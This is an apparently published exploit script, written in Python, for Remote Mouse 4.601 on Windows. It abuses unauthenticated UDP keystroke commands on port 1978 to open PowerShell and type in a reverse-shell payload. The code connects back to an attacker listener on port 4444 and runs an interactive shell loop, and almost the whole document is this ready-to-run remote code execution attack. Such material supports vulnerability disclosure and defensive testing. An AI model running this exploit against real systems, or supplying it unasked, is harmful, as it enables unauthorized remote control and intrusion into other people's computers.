# Exploit Title: Remote Mouse 4.601 - Remote Code Execution
# Date: 14/07/2025
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.remotemouse.net
# Software Link: https://www.remotemouse.net/downloads
# Version: 4.601 (Windows)
# Tested on: Windows 10 / Windows 11
# CVE: Pending

'''
Description:

This exploit targets Remote Mouse 4.6.0.1 by injecting malicious UDP
packets that simulate keyboard input to execute arbitrary PowerShell
commands. The vulnerability exists in the way Remote Mouse processes
unauthenticated UDP commands on port 1978. By sending specially crafted
packets.
'''

import socket
import time
import threading

TARGET_IP = "192.168.8.104"
TARGET_PORT = 1978
LHOST = "192.168.8.103"
LPORT = 4444

PS_REVERSE_SHELL = f"$c=New-Object
Net.Sockets.TCPClient('{LHOST}',{LPORT});$s=$c.GetStream();[byte[]]$b=0..65535|%{{0}};while(($i=$s.Read($b,0,$b.Length))){{;$d=(New-Object
Text.ASCIIEncoding).GetString($b,0,$i);$o=(iex $d 2>&1|Out-String);$o+='PS
'+(pwd).Path+'>
';$s.Write(([text.encoding]::ASCII).GetBytes($o),0,$o.Length);$s.Flush()}};$c.Close()"

def check_target():
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(3)
            s.connect((TARGET_IP, TARGET_PORT))
            data = s.recv(1024).decode().strip()
            return "nop 510" in data
    except:
        return False

def send_udp(payload):
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.sendto(payload.encode(), (TARGET_IP, TARGET_PORT))

def exploit():
    if not check_target():
        print("[-] Target not vulnerable")
        return

    def listener():
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            s.bind((LHOST, LPORT))
            s.listen(1)
            conn, addr = s.accept()
            conn.sendall(b'\r\n')
            while True:
                response = conn.recv(8192).decode(errors='ignore')
                if not response: break
                print(response, end='')
                cmd = input()
                if cmd.lower() == 'exit': break
                conn.sendall(cmd.encode() + b'\r\n')
            conn.close()

    threading.Thread(target=listener, daemon=True).start()
    time.sleep(1)

    for cmd, delay in
[("win",0.5),("[noe]powershell",1),("\r",2.5),(f"[noe]{PS_REVERSE_SHELL}",0.5),("\r",0)]:
        send_udp(f"key{len(cmd):03d}{cmd}")
        time.sleep(delay)

    print("[+] Exploit completed. Waiting for shell...")
    while True: time.sleep(1)

if __name__ == "__main__":
    exploit()